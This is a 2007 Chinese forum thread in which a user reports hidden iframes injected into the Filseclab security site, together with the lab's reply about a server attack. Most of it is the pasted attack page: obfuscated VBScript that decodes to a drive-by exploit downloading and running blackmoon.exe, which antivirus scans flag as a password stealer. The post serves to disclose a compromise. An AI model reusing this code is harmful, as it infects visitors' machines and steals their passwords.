您好:
服务器所在机房的其他服务器受到攻击,致使我们的服务器也受到牵连。此问题已经通知了ISP机房,我们也对服务器进行了防御调整,现在已经恢复。由此为大家带来的困扰敬请谅解。
谢谢,祝好!
费尔安全实验室 > 注册中心
网站: http://www.filseclab.com
邮箱: filsoft@filseclab.com
----- Original Message -----
From: <dyw1021@qq.com>
To: register
Sent: Thursday, June 07, 2007 7:00 PM
Subject: 朱老师,怎么回事啊????
费尔安全实验室
www.filseclab.com
被插入
<iframe src=http://www.yx2009.com/38327.htm width=0 height=0></iframe>
代码如下
<iframe src="http://www.yx2009.com/lt.htm" width=100 height=1></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/824349.js"></script>
<noscript><a href="http://www.51.la/?824349" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/824349.asp" style="border:none" /></a></noscript>
http://www.yx2009.com/lt.htm 代码是 <html>
<title>iexplorer</title>
<script language=vbscript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chrw(eval(s(i)))
Next
rechange=t
End Function
t="32,32,32,32,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,32,13,10,77,83,95,85,82,76,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,121,120,50,48,48,57,46,99,111,109,47,100,111,119,110,47,98,108,97,99,107,109,111,111,110,46,101,120,101,34,13,10,32,32,32,32,60,47,115,99,114,105,112,116,62"
document.write rechange(t)
</script>
<script language="VBScript">
function itkk(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
itkk=t
End Function
t="83,101,116,32,77,83,95,68,97,116,97,99,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,99,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,115,101,116,117,114,108,97,61,34,100,111,119,110,34,13,10,32,32,32,32,115,101,116,117,114,108,98,61,34,102,105,108,101,34,13,10,32,32,32,32,115,101,116,117,114,108,99,61,34,99,111,112,121,34,13,10,32,32,32,32,115,101,116,117,114,108,100,61,34,101,120,105,116,34,13,10,32,32,32,32,77,83,95,68,97,116,97,105,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,32,32,32,32,83,101,116,32,77,83,95,68,97,116,97,100,32,61,32,77,83,95,68,97,116,97,99,46,67,114,101,97,116,101,79,98,106,101,99,116,40,77,83,95,68,97,116,97,105,44,34,34,41,13,10,32,32,32,32,115,101,116,117,114,108,102,61,34,65,100,111,34,13,10,32,32,32,32,115,101,116,117,114,108,103,61,34,100,98,46,34,13,10,32,32,32,32,115,101,116,117,114,108,104,61,34,83,116,114,34,13,10,32,32,32,32,115,101,116,117,114,108,105,61,34,101,97,109,34,13,10,32,32,32,32,77,83,95,68,97,116,97,102,61,115,101,116,117,114,108,102,38,115,101,116,117,114,108,103,38,115,101,116,117,114,108,104,38,115,101,116,117,114,108,105,13,10,32,32,32,32,77,83,95,68,97,116,97,103,61,77,83,95,68,97,116,97,102,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,97,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,77,83,95,68,97,116,97,103,44,34,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,116,121,112,101,32,61,32,49,13,10,32,32,32,32,77,83,95,68,97,116,97,104,61,34,71,69,84,34,13,10,32,32,32,32,77,83,95,68,97,116,97,100,46,79,112,101,110,32,77,83,95,68,97,116,97,104,44,32,77,83,95,85,82,76,44,32,70,97,108,115,101,13,10,32,32,32,32,77,83,95,68,97,116,97,100,46,83,101,110,100,13,10,32,32,32,32,69,120,101,70,105,108,101,61,34,77,85,69,88,69,46,101,120,101,34,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,98,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,101,32,61,32,77,83,95,68,97,116,97,98,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,111,112,101,110,13,10,32,32,32,32,69,120,101,70,105,108,101,61,32,77,83,95,68,97,116,97,98,46,66,117,105,108,100,80,97,116,104,40,77,83,95,68,97,116,97,101,44,69,120,101,70,105,108,101,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,119,114,105,116,101,32,77,83,95,68,97,116,97,100,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,115,97,118,101,116,111,102,105,108,101,32,69,120,101,70,105,108,101,44,50,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,99,108,111,115,101,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,101,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,101,46,83,104,101,108,108,69,120,101,99,117,116,101,32,69,120,101,70,105,108,101,44,66,66,83,44,66,66,83,44,34,111,112,101,110,34,44,48"
i=t
d=t
execute(itkk(I))
</script>
<script language=javascript src=blackmoon.js></script>
<center> <br>
</center>
</html>
解密后下载
http://www.××××.com/down/blackmoon.exe
在线扫描
A-SquaredFound nothing
AntiVirFound DR/Delphi.Gen
ArcaVirFound nothing
AvastFound nothing
AVG AntivirusFound nothing
BitDefenderFound Generic.PWStealer.E6C8F7B9
ClamAVFound nothing
Dr.WebFound nothing
F-Prot AntivirusFound nothing
F-Secure Anti-VirusFound nothing
FortinetFound nothing
Kaspersky Anti-VirusFound nothing
NOD32Found a variant of Win32/PSW.Delf.NHI
Norman Virus ControlFound nothing
Panda AntivirusFound nothing
Rising AntivirusFound nothing
VirusBusterFound nothing
VBA32Found Trojan-Spy.Delf.13 (probable variant)
[ 本帖最后由 dyw1021 于 2007-6-8 01:22 编辑 ] |
[复制链接]
发表于 2007-6-7 20:36:38
